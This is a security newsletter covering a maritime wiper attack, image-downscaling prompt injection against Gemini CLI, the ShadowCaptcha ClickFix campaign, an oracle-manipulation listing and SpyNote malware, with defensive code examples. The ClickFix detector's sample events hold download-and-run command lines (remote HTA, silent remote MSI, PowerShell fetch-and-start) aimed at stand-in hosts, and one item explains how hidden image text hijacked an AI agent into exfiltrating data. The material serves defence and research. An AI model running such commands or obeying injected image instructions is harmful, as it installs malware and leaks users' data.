TRENDING TOPICS AUG 26, 2025

Iranian Shipping Crippled Through Maritime Communications Hack 

In late August 2025, a coordinated cyberattack crippled Iran’s maritime communications, severing satellite links, navigation data, and port coordination for 64 vessels. The operation, attributed to the hacktivist group Lab-Dookhtegan, did not breach each ship directly. Instead it compromised Fanava Group, the Iranian IT provider that manages satellite terminals for the country’s tanker and cargo fleets, a reminder that a fleet is only as secure as its vendor. The attackers gained root on outdated iDirect Falcon terminals, which still ran Linux kernel 2.6.35 (a 2010-era release long out of support), by exploiting unpatched flaws. They then mapped the fleet through a centralized MySQL database containing modem serial numbers, vessel configurations, and IP phone records. With that blueprint they issued commands that overwrote critical partitions on shipboard systems with zeros, wiping navigation logs, archives, configurations, and even the recovery partitions. Because the recovery slices were gone too, remote restoration was impossible; every affected vessel now needs an engineer on board for a full reinstall, which can sideline a ship for weeks or months. Researchers confirmed that the attackers had been inside these networks since at least May, quietly conducting reconnaissance and testing before triggering a destructive blackout that rendered terminals across the fleet inoperable. The disruption struck NITC and IRISL, two sanctioned operators central to Iran’s covert oil trade, at a time of mounting U.S. Treasury sanctions against companies tied to Iranian exports. Without functioning Falcon terminals, the ships lost email, automated weather updates, AIS tracking, and the ability to coordinate with ports, raising the risk of collisions, delays, or seizure in contested waters. Evidence also showed exfiltration of plaintext IP-phone credentials, exposing vessels to eavesdropping or impersonation. 
The scale and precision of the attack show how a single supplier compromise can cascade into strategic paralysis across an entire industry, particularly one that depends on legacy, unpatched systems. By planting malicious cron jobs and orchestrating shutdowns across dozens of vessels simultaneously, Lab-Dookhtegan delivered a targeted blow with geopolitical implications and demonstrated how fragile maritime infrastructure is against cyber sabotage. Although this incident targeted Iran, the risk is global: vessels worldwide rely on the same generation of satellite communication terminals, and a compromise of any operator’s vendor could produce similar large-scale disruption. The incident highlights the urgent need for strict patching regimes (or replacement of terminals that can no longer be patched), segmentation of the management interfaces that vendors use to reach shipboard equipment, and zero-trust controls on that vendor access, to secure critical communications networks and prevent supply chain attacks of this magnitude.

Hidden Prompts in Images Expose AI Systems to Data Theft  

Trail of Bits researchers have shown how malicious instructions can be hidden inside images before they are sent to AI systems. The trick exploits the fact that most platforms automatically downscale uploaded images before the model sees them; downscaling discards or averages most of the source pixels, so an image built for a specific algorithm (nearest neighbor, bilinear, or bicubic interpolation) can be arranged so that the surviving pixels form text that is invisible at full resolution. In their demonstration, dark regions of the full-size image shift tone after downscaling and black text that had been hidden in them emerges, leading the model to read and follow instructions that the user never intended to give. To prove the risk, they showed a Gemini CLI setup, configured to auto-approve tool calls, in which an uploaded image carrying such a command caused Google Calendar data to be exfiltrated. Because the user only ever sees the full-resolution image, everything looks normal while the model quietly executes the injected actions. Testing confirmed the technique against multiple platforms, including Gemini CLI, Vertex AI Studio, Google Assistant, and other systems that downscale images automatically. The team released Anamorpher, an open-source tool that generates images tailored to each downscaling method, so that others can reproduce and test the technique. Because the attack rides on a preprocessing step that almost every multimodal pipeline performs, it potentially affects a wide range of AI tools beyond those tested. The researchers recommend tightly controlling image uploads with clear limits on size and dimensions, and showing the user a preview of the downscaled image the model will actually process. They also advise requiring explicit confirmation before sensitive tool actions are executed, especially when text is detected inside images. The durable fix is systematic, system-level defenses that resist prompt injection across all channels; organizations should treat every multimodal input as a possible attack surface.
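The mechanism above comes down to which source pixels survive the resize. The block below is an added illustration written for this page, not Anamorpher or any Trail of Bits code. It implements a toy nearest-neighbour downscaler (sampling each block's top-left pixel is an assumption; real libraries choose the sample point differently, and bilinear or bicubic kernels need the more careful per-kernel construction that Anamorpher performs), builds an image whose sampled pixels spell a hidden glyph, and contrasts it with an area-averaging downscaler that washes the glyph out. The `aliasing_score` heuristic at the end is my own suggestion for a triage check, not a recommendation from the Trail of Bits post.

```python
from typing import List

Image = List[List[int]]  # grayscale rows; 0 = black, 255 = white


def downscale_nearest(img: Image, factor: int) -> Image:
    """Nearest-neighbour: keep one source pixel per factor x factor block.
    Toy assumption: the block's top-left pixel is the one kept."""
    return [[img[y * factor][x * factor] for x in range(len(img[0]) // factor)]
            for y in range(len(img) // factor)]


def downscale_area(img: Image, factor: int) -> Image:
    """Box (area) filter: average every block, so every source pixel contributes."""
    h, w = len(img) // factor, len(img[0]) // factor
    out = []
    for y in range(h):
        row = []
        for x in range(w):
            block = [img[y * factor + dy][x * factor + dx]
                     for dy in range(factor) for dx in range(factor)]
            row.append(sum(block) // len(block))
        out.append(row)
    return out


def craft_aliased(hidden: Image, factor: int, background: int = 255) -> Image:
    """Put the hidden pattern only at the pixels nearest-neighbour will sample.
    At full size the result is a sparse dot dither on a plain background; after
    the resize it is the hidden pattern, pixel for pixel."""
    h, w = len(hidden), len(hidden[0])
    img = [[background] * (w * factor) for _ in range(h * factor)]
    for y in range(h):
        for x in range(w):
            img[y * factor][x * factor] = hidden[y][x]
    return img


def aliasing_score(img: Image, factor: int) -> float:
    """Defender heuristic (my own): mean disagreement between two downscalers.
    A large value means the image carries content only one sampling scheme sees,
    which is a reason to show the user the real preview and ask before acting."""
    a, b = downscale_nearest(img, factor), downscale_area(img, factor)
    diffs = [abs(pa - pb) for ra, rb in zip(a, b) for pa, pb in zip(ra, rb)]
    return sum(diffs) / len(diffs)


# Constructed hidden payload: a black "T" on white, standing in for injected text
HIDDEN: Image = [
    [0, 0, 0, 0, 0],
    [255, 255, 0, 255, 255],
    [255, 255, 0, 255, 255],
    [255, 255, 0, 255, 255],
    [255, 255, 0, 255, 255],
]


def render(img: Image) -> str:
    return "\n".join("".join("#" if p < 128 else "." for p in row) for row in img)


if __name__ == "__main__":
    full = craft_aliased(HIDDEN, 4)
    print("full resolution (what the user sees):\n" + render(full))
    print("nearest-neighbour downscale (what the model sees):\n" + render(downscale_nearest(full, 4)))
    print("area downscale:\n" + render(downscale_area(full, 4)))
    print("aliasing score:", aliasing_score(full, 4))
```

The area-averaged version of the crafted image comes out almost uniformly bright (each dark sample is diluted by fifteen white neighbours), which is why the attack has to be built for the exact kernel the target uses and why showing the user the genuinely downscaled image, rather than a thumbnail produced by a different resampler, is the preview that matters.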

ShadowCaptcha Campaign Abuses WordPress Sites for Multi-Stage Attacks  

The ShadowCaptcha campaign uses more than 100 compromised WordPress sites to redirect visitors to fake CAPTCHA verification pages that mimic Cloudflare or Google. The sites have been injected with malicious JavaScript that starts a redirection chain ending in a ClickFix lure, the social engineering pattern in which the victim is talked into running a command on their own machine. On the fraudulent CAPTCHA page, the instructions branch into two attack flows. In one, users are told to open the Windows Run dialog and paste a command that launches an MSI installer or a remote HTA file, deploying the Lumma and Rhadamanthys information stealers. In the other, victims are persuaded to save and execute a malicious HTML Application file, which delivers Epsilon Red ransomware. The victim never has to copy anything themselves: obfuscated JavaScript on the page places the command in the clipboard, and the on-screen instructions then walk the user through pasting it, so attacker code runs without the user ever seeing what was pasted. Additional stealth measures include anti-debugging JavaScript that hinders inspection in browser developer tools and DLL side-loading so the malware runs under the guise of legitimate processes. The campaign is sizable, with most compromised WordPress sites hosted in Australia, Brazil, Italy, Canada, Colombia, and Israel, spanning industries including healthcare, hospitality, finance, law, and technology. The operation shows how attackers turn simple web compromises into multi-stage intrusions that lead to credential harvesting, resource hijacking, and ransomware outbreaks. ShadowCaptcha pairs increasingly polished social engineering with abuse of trusted platforms, making WordPress security a frontline defense. 
To reduce risk, administrators should keep WordPress core, themes, and plugins patched, enable multi-factor authentication for administrator logins, and teach users that no legitimate CAPTCHA ever asks them to paste a command into the Run dialog or to save and run a file. On endpoints, restricting or alerting on mshta.exe and remote MSI installs started from the Run dialog cuts off both flows at the point where the victim's paste becomes execution.
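Both ClickFix flows end with the victim launching a living-off-the-land binary from the Run dialog, which makes the process-start event the natural place to catch them. The rule below is an added example written for this page, not a detection from the ShadowCaptcha report or any vendor. It assumes telemetry in the shape of Sysmon Event ID 1 (parent image, image, command line) and relies on the fact that commands typed into Win+R run as children of explorer.exe; the sample events, hostnames, and indicator weights are constructed and illustrative.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


# Constructed events in the spirit of Sysmon Event ID 1 / EDR process-start telemetry.
# Hostnames are reserved documentation values, not indicators from the campaign.
SAMPLE_EVENTS = [
    ProcessEvent("explorer.exe", "mshta.exe",
                 "mshta.exe https://verify.example.invalid/captcha.hta"),
    ProcessEvent("explorer.exe", "msiexec.exe",
                 "msiexec.exe /i https://cdn.example.invalid/update.msi /qn"),
    ProcessEvent("explorer.exe", "powershell.exe",
                 'powershell.exe -w hidden -c "iwr https://x.example.invalid/a.hta '
                 '-o $env:TEMP\\a.hta; start $env:TEMP\\a.hta"'),
    ProcessEvent("explorer.exe", "notepad.exe", r"notepad.exe C:\Users\alice\notes.txt"),
    ProcessEvent("services.exe", "msiexec.exe", "msiexec.exe /V"),
]

# Binaries a ClickFix one-liner typically leans on when typed into Win+R (assumed list)
RUN_DIALOG_LOLBINS = {"mshta.exe", "msiexec.exe", "powershell.exe", "pwsh.exe", "cmd.exe",
                      "curl.exe", "certutil.exe", "bitsadmin.exe", "rundll32.exe", "regsvr32.exe"}
REMOTE_RESOURCE = re.compile(r"https?://|\\\\[\w.-]+\\", re.IGNORECASE)
QUIET_FLAGS = re.compile(r"-w(?:indowstyle)?\s+hidden|/q[nb]?\b|-nop\b|-ep\s+bypass",
                         re.IGNORECASE)
HTA_PAYLOAD = re.compile(r"\.hta\b", re.IGNORECASE)


def score_event(ev: ProcessEvent) -> Tuple[int, List[str]]:
    """Count independent ClickFix indicators present on one process start."""
    reasons = []
    if ev.parent_image.lower() == "explorer.exe" and ev.image.lower() in RUN_DIALOG_LOLBINS:
        reasons.append("LOLBin started from the interactive shell (Run dialog or Explorer)")
    if REMOTE_RESOURCE.search(ev.command_line):
        reasons.append("remote resource in command line")
    if QUIET_FLAGS.search(ev.command_line):
        reasons.append("silent or hidden execution flag")
    if HTA_PAYLOAD.search(ev.command_line):
        reasons.append("HTML Application payload")
    return len(reasons), reasons


def detect_clickfix(events: List[ProcessEvent], min_score: int = 2):
    """Return (event, reasons) for every start with at least min_score indicators."""
    alerts = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= min_score:
            alerts.append((ev, reasons))
    return alerts


if __name__ == "__main__":
    for ev, reasons in detect_clickfix(SAMPLE_EVENTS):
        print(f"ALERT {ev.parent_image} -> {ev.image}: {'; '.join(reasons)}")
        print(f"      {ev.command_line}")
```

Requiring two indicators keeps a user opening Notepad from the Run dialog, or a service-driven `msiexec`, out of the alert queue, while the stealer flow (remote MSI with `/qn`) and the ransomware flow (remote or saved `.hta`) both accumulate three or more.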

SOCRadar Detects Alleged Price-Oracle 0-Day Exploit Listing on Dark Web 

Researchers at SOCRadar recently flagged a dark web forum post advertising what its seller calls a zero-day vulnerability affecting oracle-based crypto protocols. The oracle here is the price feed a DeFi lending protocol relies on to value collateral, not Oracle Corporation’s software. According to the listing, the exploit enables attackers to manipulate market data feeds and trigger profitable self-liquidation events. The post describes a two-step process: first, altering oracle data to present false prices, and second, using those manipulated prices to force liquidations in which the liquidation bonus is worth more than the debt being repaid. The seller further claims that the attack can be repeated to drain collateral from a protocol until it becomes insolvent. A proof-of-concept (PoC) and step-by-step instructions are allegedly included, with the price “negotiated” directly with interested buyers. It is essential to emphasize that none of this can be independently verified. Dark web listings frequently exaggerate, misrepresent, or outright fabricate exploits to attract attention or scam buyers. While the post matches real-world attack patterns seen in decentralized finance, where oracle manipulation has been a frequent vector, the claim itself should not be treated as actionable intelligence. Instead it is an indicator that threat actors continue to prioritize oracle-based attacks because of their high financial payoff. Security teams managing crypto protocols should take it as a reminder to harden oracle integrations (for example, by refusing price updates that deviate sharply from a time-weighted average or a second independent feed), deploy anomaly detection for suspicious market data patterns, and rehearse incident response plans tailored to manipulation and liquidation scenarios.
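To make the two-step mechanism concrete, here is an added toy model of a collateralised lending market, written for this page rather than taken from the listing, from SOCRadar, or from any real protocol. The parameters (80% liquidation threshold, 5% liquidator bonus, 50% close factor, 10% deviation guard) are assumed, and whether the borrower and liquidator are the same party does not change the arithmetic. It shows a healthy position becoming liquidatable at a fabricated price, the liquidator's profit measured at the true price, and a deviation check against a time-weighted average that would refuse the fabricated reading.

```python
from dataclasses import dataclass

# Toy lending-market parameters (assumed for illustration, not any real protocol's)
LIQ_THRESHOLD = 0.80   # liquidatable once debt exceeds 80% of collateral value
LIQ_BONUS = 0.05       # liquidator buys collateral at a 5% discount
CLOSE_FACTOR = 0.50    # one liquidation may repay at most half the debt
MAX_DEVIATION = 0.10   # oracle guard: reject spot prices more than 10% away from the TWAP


@dataclass
class Position:
    collateral: float   # units of the collateral asset
    debt: float         # stable units borrowed


def health_factor(pos: Position, price: float) -> float:
    """Above 1.0 the position is safe; below it anyone may liquidate."""
    return pos.collateral * price * LIQ_THRESHOLD / pos.debt


def liquidate(pos: Position, price: float, repay: float):
    """Repay part of the debt and seize collateral valued at `price`, plus the bonus.
    Returns (repaid, seized_units). Raises if the position is healthy at `price`."""
    if health_factor(pos, price) >= 1.0:
        raise ValueError("position is healthy at this price")
    repaid = min(repay, pos.debt * CLOSE_FACTOR)
    seized = min(repaid * (1 + LIQ_BONUS) / price, pos.collateral)
    pos.debt -= repaid
    pos.collateral -= seized
    return repaid, seized


def liquidator_profit(repaid: float, seized: float, true_price: float) -> float:
    """Profit measured at the real market price, not at the oracle's number."""
    return seized * true_price - repaid


def deviation_ok(spot: float, twap: float, max_dev: float = MAX_DEVIATION) -> bool:
    """Oracle sanity check: a single reading far from the time-weighted average is suspect."""
    return abs(spot - twap) / twap <= max_dev


def run_scenario(true_price: float = 1000.0, manipulated_price: float = 700.0) -> dict:
    # Borrower holds 10 units worth 10,000 against 6,000 of debt: comfortably healthy.
    health_before = health_factor(Position(10.0, 6000.0), true_price)
    # Attack: the oracle is fed a depressed price and the attacker liquidates at it.
    repaid, seized = liquidate(Position(10.0, 6000.0), manipulated_price, 3000.0)
    attack_profit = liquidator_profit(repaid, seized, true_price)
    # Baseline: a genuine crash to the same price yields only the ordinary 5% bonus.
    honest_profit = liquidator_profit(repaid, seized, manipulated_price)
    return {
        "health_before": round(health_before, 3),
        "seized_units": round(seized, 3),
        "attack_profit": round(attack_profit, 2),
        "honest_profit": round(honest_profit, 2),
        "guard_accepts_manipulated_price": deviation_ok(manipulated_price, true_price),
    }


if __name__ == "__main__":
    for key, value in run_scenario().items():
        print(f"{key}: {value}")
```

At the true price the position cannot be liquidated at all; at the fabricated price the liquidator repays 3,000 and walks away with 4.5 units worth 4,500, a 1,500 gain versus the 150 an honest liquidation at a real crash would earn. The deviation guard rejects the 30% move outright, which is the cheapest of the hardening measures the text recommends, though a sufficiently patient attacker can walk a TWAP down too, so it belongs alongside a second feed and anomaly monitoring rather than in place of them.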

Update: SpyNote Malware Resurfaces Through Fake Google Play Store Campaigns 

Researchers have observed a new wave of SpyNote malware targeting Android users through fake Google Play Store pages that look legitimate. The fraudulent sites replicate real installation pages using stolen HTML and CSS to trick users into downloading malicious APKs. The campaigns target people searching for well-known social, gaming, and utility apps, impersonating titles such as iHappy, CamSoda, 8 Ball Pool, Block Blast, and Chrome. When a victim taps the install button, embedded JavaScript automatically begins downloading the malware-laden file from attacker-controlled infrastructure. Investigations show these operations share a consistent footprint: IP addresses tied to Lightnode Limited and Vultr Holdings, domains registered through NameSilo and XinNet, and TLS certificates issued by Let’s Encrypt’s R10 and R11 intermediates, which give the pages a valid padlock. That recurring infrastructure points to a coordinated, persistent effort to spread the trojan at scale. The latest SpyNote samples carry anti-analysis measures that make detection and research significantly harder. The initial dropper APK hides its payload in AES-encrypted assets, with the decryption key derived from the app’s own package name. Once decrypted, the malware uses DEX element injection to alter Android’s ClassLoader so that its classes are resolved ahead of the legitimate ones, letting SpyNote hijack app behavior and intercept data, while obfuscated, near-identical identifiers frustrate static analysis. Once installed, it operates as a full-featured remote access trojan, capable of activating cameras and microphones, stealing credentials and two-factor authentication codes, performing overlay attacks, keylogging, and even wiping or locking devices if granted device administrator rights. 
With its ability to exfiltrate sensitive data and maintain deep control, SpyNote poses a significant privacy and financial risk to mobile users. Experts emphasize improving browser-based detection of fake app stores, refining automated malware analysis for Android apps, and adding network-level filtering to mobile VPNs to disrupt these campaigns before they reach end users.
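Droppers that hide an encrypted payload under assets/ are easy to triage with an entropy check before anyone attempts decryption. The block below is an added example written for this page, not code from the SpyNote research or from any analysis tool: it builds a constructed zip that stands in for an APK (an APK is a zip, so the same scan runs unchanged on a real file) and flags assets whose bytes look like ciphertext while ignoring formats that are high-entropy for legitimate reasons. The 7.5 bits-per-byte threshold and the container magic list are assumptions; recovering the key from the package name, as the text describes, would be the analyst's next step and is not modeled here.

```python
import io
import math
import random
import zipfile
from collections import Counter
from typing import List, Tuple


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; 8.0 is the ceiling, reached by uniformly random or well-encrypted data."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


# Magic bytes of containers that are high-entropy for legitimate reasons (assumed list):
# zip/jar, PNG, JPEG, RIFF (WebP/WAV), gzip
KNOWN_CONTAINERS = (b"PK\x03\x04", b"\x89PNG", b"\xff\xd8\xff", b"RIFF", b"\x1f\x8b")


def scan_assets(apk: bytes, threshold: float = 7.5, min_size: int = 1024) -> List[Tuple[str, float]]:
    """List assets/ entries that look encrypted: large, near-8-bit entropy, and not a
    recognised compressed or media container."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(apk)) as z:
        for info in z.infolist():
            if not info.filename.startswith("assets/") or info.file_size < min_size:
                continue
            data = z.read(info)
            if data.startswith(KNOWN_CONTAINERS):
                continue
            h = shannon_entropy(data)
            if h >= threshold:
                findings.append((info.filename, round(h, 3)))
    return findings


def build_sample_apk() -> bytes:
    """Constructed stand-in for a dropper APK. The 'encrypted' asset is seeded
    pseudo-random bytes, not real ciphertext and not real malware."""
    rng = random.Random(20250826)
    encrypted_like = bytes(rng.getrandbits(8) for _ in range(8192))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as z:
        z.writestr("AndroidManifest.xml", '<manifest package="com.example.fakeapp"/>')
        z.writestr("assets/strings.json", '{"title": "8 Ball Pool", "cta": "Install"}\n' * 50)
        # A PNG is high-entropy too, but the magic bytes tell the scanner to ignore it
        z.writestr("assets/icon.png", b"\x89PNG\r\n\x1a\n" + encrypted_like[:2048])
        z.writestr("assets/data.bin", encrypted_like)
    return buf.getvalue()


if __name__ == "__main__":
    for name, entropy in scan_assets(build_sample_apk()):
        print(f"{name}: {entropy} bits/byte, likely encrypted payload")
```

On a real sample, feed the APK bytes straight to `scan_assets`; a blob that scores near 8.0, is not a known container, and sits next to a dropper's tiny DEX is the asset to carve out and decrypt. Compressed-but-unknown formats can trip the check too, so treat a hit as a lead for the analyst rather than a verdict.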

💡
Hunter Strategy encourages our readers to look for updates in our daily Trending Topics and on Twitter.